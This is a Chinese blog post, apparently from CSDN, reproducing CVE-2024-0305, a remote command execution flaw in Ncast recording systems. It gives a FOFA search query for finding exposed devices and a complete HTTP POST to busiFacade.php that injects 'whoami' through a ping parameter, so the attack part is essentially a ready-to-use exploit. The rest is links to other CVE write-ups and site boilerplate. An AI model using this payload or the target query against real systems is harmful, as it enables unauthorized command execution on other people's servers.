Ncast盛可视 CVE-2024-0305 远程命令执行漏洞复现

最新推荐文章于 2025-05-01 23:47:29 发布
最新推荐文章于 2025-05-01 23:47:29 发布
阅读量1.1k 收藏 11
点赞数 6
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_64366018/article/details/135675075
版权
这篇文章揭示了一起与0x01fofa相关的漏洞,影响了Ncast2007和Ncast2017版本的系统。攻击者通过构造payload在登录页面进行抓包并利用POST请求对busiFacade.php文件发起攻击,可能导致用户数据泄露或系统安全威胁。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 fofa语句

icon_hash="-1253433910"

0x02 漏洞影响

Ncast 2007
Ncast 2017

0x03 漏洞利用

登录页面

抓包,构造payload

POST /classes/common/busiFacade.php HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 102
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | whoami"]}

柯达_
关注
Ncast可视高清智能录播系统busiFacade RCE漏洞(CVE-2024-0305)
weixin_43567873的博客
03-09 211
Ncast可视高清智能录播系统busiFacade RCE漏洞(CVE-2024-0305)
Ncast可视 高清智能录播系统 IPSetup.php信息泄露+RCE漏洞复现(CVE-2024-0305)
0xSec
01-10 1537
广州盈科电子技术Ncast可视 高清智能录播系统可通过访客身份访问/manage/IPSetup.php后台功能模块,攻击者可以利用该逻辑缺陷查看后台配置信息造成信息泄露,使用网络诊断功能模块可实现未授权远程命令执行,导致服务器失陷被控。
Ncast-RCE(CVE-2024-0305)
weixin_62352348的博客
01-29 459
Ncast可视高清智能录播系统是一套新进的音视频录制和播放系统,旨在提供高质量,高清定制的录播功能。该系统/classes/common/busiFacade.php接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器。
Ncast可视高清智能录播系统存在RCE漏洞(CVE-2024-0305)
wan___she__pi的博客
03-15 590
漏洞复现
漏洞复现Ncast可视-高清智能录播系统-远程命令执行-IPSetup
知黑而守白
06-20 107
可视电子是一家专注于多媒体通信、视音频编解码、智能图像处理三大领域的产品研发以及优秀互联网服务的高新科技企业。盈可视电子坚持自主创新,已开发出多项具有自主知识产权的创新性产品,盈可视电子产品包括:高清多媒体录播系统、图像识别跟踪系统、图像点击跟踪系统、视频互动系统、数字告示系统。Ncast可视-高清智能录播系统可通过访客身份未授权访问 /manage/IPSetup.php 后台功能模块,攻击者可以利用该漏洞查看后台配置信息造成信息泄露,使用网络诊断功能模块可实现未授权远程命令执行,导致服务器失陷被控。
漏洞复现Ncast可视-高清智能录播系统-IPSetup.php-RCE漏洞
知黑而守白
01-10 364
Ncast是一家专注于多媒体通信、视音频编解码、智能图像处理三大领域的产品研发以及优秀互联网服务的高新科技企业。盈可视电子坚持自主创新,已开发出多项具有自主知识产权的创新性产品,盈可视电子产品包括:高清多媒体录播系统、图像识别跟踪系统、图像点击跟踪系统、视频互动系统、数字告示系统。Ncast可视-高清智能录播系统可通过访客身份未授权访问 /manage/IPSetup.php 后台功能模块,攻击者可以利用该漏洞查看后台配置信息造成信息泄露,使用网络诊断功能模块可实现未授权远程命令执行,导致服务器失陷被控。
CVE-2024-0569复现及IDS snort防御
2401_82670286的博客
01-29 703
发现了一个被归类为有问题的漏洞,该漏洞存在于Totolink T8 4.1.5cu.833_20220905版本中。该漏洞影响了文件/cgi-bin/cstecgi.cgi中Setting Handler组件的getSysStatusCfg功能。对参数ssid/key的操纵导致信息泄露。攻击者可以远程发起攻击。该漏洞已经公开披露并可能被滥用。升级到版本4.1.5cu.862_B20230228可以解决此问题。建议升级受影响的组件。该漏洞被分配了识别号VDB-250785。
Ivanti VPN RCE漏洞复现CVE-2024-21887)
0xSec
01-18 2816
Ivanti Connect Secure (9.x, 22.x) 和Ivanti Policy Secure (9.x, 22.x) 的web组件中存在身份验证绕过漏洞CVE-2023-46805)和命令注入漏洞CVE-2024-21887),成功利用该漏洞链允许远程未经认证的攻击者以root权限执行任意操作系统命令,导致服务器失陷。
CVE-2024-26229 漏洞复现分析
Misaka10046的博客
08-30 989
该本地提权漏洞是Csc.sys驱动中CscDevFcbXXXControlFile函数存在越界读写导致的。
CVE-2024-24565:CrateDB数据库任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
02-04 537
CrateDB 5.3.9之前、5.4.8之前、5.5.4之前和 5.6.1之前版本存在路径遍历漏洞,该漏洞源于COPY FROM函数存在缺陷,攻击者利用该漏洞可以使用COPY FROM函数将任意文件内容导入到数据库表中,从而导致信息泄露。
复现】D-Tale SSRF漏洞(CVE-2024-21642)_26
fushuang333的博客
01-22 914
复现】D-Tale SSRF漏洞(CVE-2024-21642),可能会进行端口扫描,内网Web应用指纹识别,攻击内网Web应用
likeshop开源免费商用电商系统存在任意文件上传漏洞CVE-2024-0352
nnn2188185的博客
01-17 497
likeshop开源免费商用电商系统存在任意文件上传漏洞CVE-2024-0352
Hack The Box - Redpanda 利用Spring Boot SSTI漏洞获取初始访问权限,Linux系统内核漏洞(CVE-2022-2588)提权,XXE漏洞获取root私钥
Zyu0
12-02 1592
Hack The Box - Redpanda 利用Spring Boot SSTI漏洞获取初始访问权限,Linux系统内核漏洞(CVE-2022-2588)提权,XML外部实体(XXE)注入提权
CVE-2023-21839远程代码执行漏洞
刘家华(游戏开发)
05-01 1737
weblogic CVE-2023-21839、CVE-2023-21931、CVE-2023-21979远程代码执行漏洞复现
Jenkins 任意文件读取(CVE-2024-23897)修复及复现
鸭梨山大。
12-24 1214
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。
CVE-2024-23334 aiohttp static follow_symlinks未授权任意文件读取漏洞】【漏洞复现】【漏洞poc】
weixin_43977052的博客
03-06 613
aiohttp是一个Python的HTTP客户端/服务器框架,它基于asyncio库实现异步编程模型,可以支持高性能和高并发的HTTP通信。aiohttp用于编写异步的Web服务器、Web应用程序或HTTP客户端,以提供对Web和HTTP资源的访问和操作。
内存安全的攻防战:工具链与语言特性的协同突围
最新发布
2501_90200491的博客
05-01 1036
C++ 的内存安全攻坚战,本质上是工具链创新、语言特性进化、开发范式转变的系统性工程。当 Clang 的静态分析、SaferCPlusPlus 的安全抽象、GCC 的编译器优化形成合力,内存安全问题正从 "随机地雷" 转变为 "可控风险"。对于开发者而言,掌握 "静态分析早发现、安全库防患未然、编译器优化兜底" 的三层防御体系,才能在高性能与高安全的平衡中占据主动。
安全指南 | MCP安全检查清单:AI工具生态系统的隐形守护者
GentelAi的博客
04-30 1217
在确保技术便利性的同时,开发者和用户应保持警惕,时刻关注MCP系统的安全隐患。通过采取必要的安全措施,MCP 的应用前景仍然广阔,能够为AI行业的发展提供坚实的基础。
租用gpu训练stable diffusion
01-30
### 租用GPU以训练Stable Diffusion模型 为了有效运行并加速Stable Diffusion模型,特别是当本地硬件资源不足时,租用云端GPU成为一种高效的选择。考虑到特定需求,即NVIDIA GPU、至少8GB显存以及适当的操作环境配置[^1],多个云服务平台提供了适合此类任务的服务。 #### 选择合适的云计算服务提供商 一些知名的云计算服务商提供按需付费的GPU实例选项,这些平台通常具备灵活的资源配置能力,允许用户根据项目具体要求定制计算资源: - **Amazon Web Services (AWS)** 提供多种类型的EC2实例,其中P系列和G系列特别适用于机器学习工作负载。 - **Google Cloud Platform (GCP)** 的虚拟机支持附加高性能GPU,并且拥有预构建的Deep Learning VM镜像简化设置过程。 - **Microsoft Azure** 同样供应专门针对AI应用优化过的NDv2/NCasT4_v3等系列VM规格。 上述各平台上均能找到满足最低硬件标准(如NVIDIA Tesla V100或更高级别产品线)及相应软件栈安装指南的信息。 #### 配置与启动GPU实例 一旦选定目标供应商及其提供的合适方案,则应按照官方文档指示完成如下操作: 1. 注册账号并通过验证流程; 2. 创建新项目或进入已有工程空间内; 3. 浏览市场列表挑选含有所需框架版本(PyTorch/TensorFlow)的基础映像作为模板; 4. 定义网络参数、安全组规则确保外部访问权限可控; 5. 发起实例创建请求直至成功部署完毕; 此时即可通过SSH连接至远程服务器执行后续命令行指令来传输数据集、克隆仓库代码库并调整超参设定等内容[^2]。 ```bash # 假设已建立好无密码登录机制的情况下复制整个目录结构 cp -r /gemini/data-1/models /gemini/code/stable-diffusion-webui/ ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值